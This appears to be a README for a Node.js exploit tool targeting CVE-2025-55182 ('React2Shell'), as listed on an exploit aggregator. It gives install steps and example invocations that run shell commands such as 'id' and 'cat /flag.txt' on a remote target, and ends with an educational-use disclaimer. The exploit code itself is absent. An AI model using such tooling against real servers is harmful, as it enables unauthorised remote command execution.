Share
## https://sploitus.com/exploit?id=16CB34C2-DBE8-59CB-8D56-FBA72E020228
# React2Shell Exploit - CVE-2025-55182
**Author:** andrei2308
## Install
```bash
npm install
```
## Usage
```bash
node exploit.js -t
```
## Examples
```bash
node exploit.js -t http://target.com:3000 "id"
node exploit.js -t http://target.com:3000 "cat /flag.txt"
node exploit.js -t http://target.com:3000 "ls -la"
```
## Help
```bash
node exploit.js --help
```
## Disclaimer
For educational purposes only. Unauthorized access is illegal.